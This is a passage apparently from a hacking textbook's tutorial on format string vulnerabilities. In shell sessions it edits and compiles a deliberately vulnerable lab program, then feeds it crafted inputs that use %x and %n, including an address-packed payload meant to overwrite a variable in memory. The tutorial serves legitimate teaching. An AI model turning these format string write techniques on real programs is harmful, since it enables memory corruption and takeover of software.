Graphics Programs Reference
In-Depth Information
Here,
next_val
is initialized with the value
0x11111111
, so the effect of the
write operations on it will be apparent.
reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/g;x;G}'
fmt_vuln.c > fmt_vuln2.c
reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c
7c7
< static int test_val = -72;
---
> static int test_val = -72, next_val = 0x11111111;
27a28
> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);
reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c
reader@hacking:~/booksrc $ ./fmt_vuln2 test
The right way:
test
The wrong way:
test
[*] test_val @ 0x080497b4 = -72 0xffffffb8
[*] next_val @ 0x080497b8 = 286331153 0x11111111
reader@hacking:~/booksrc $
As the preceding output shows, the code change has also moved the
address of the
test_val
variable. However,
next_val
is shown to be adjacent to it.
For practice, let's write an address into the variable
test_val
again, using the
new address.
Last time, a very convenient address of
0xddccbbaa
was used. Since each
byte is greater than the previous byte, it's easy to increment the byte counter
for each byte. But what if an address like
0x0806abcd
is used? With this address,
the first byte of
0xCD
is easy to write using the
%n
format parameter by output-
ting 205 bytes total bytes with a field width of 161. But then the next byte to
be written is
0xAB
, which would need to have 171 bytes outputted. It's easy to
increment the byte counter for the
%n
format parameter, but it's impossible
to subtract from it.
reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x
The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbffff3d0b7fe75fc041414141
[*] test_val @ 0x080497f4 = -72 0xffffffb8
[*] next_val @ 0x080497f8 = 286331153 0x11111111
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"
$1 = 200
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\xf6\
x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n
The right way to print user-controlled input:
??JUNK??JUNK??JUNK??%x%x%8x%n
The wrong way to print user-controlled input:
??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0
[*] test_val @ 0x08049794 = -72 0xffffffb8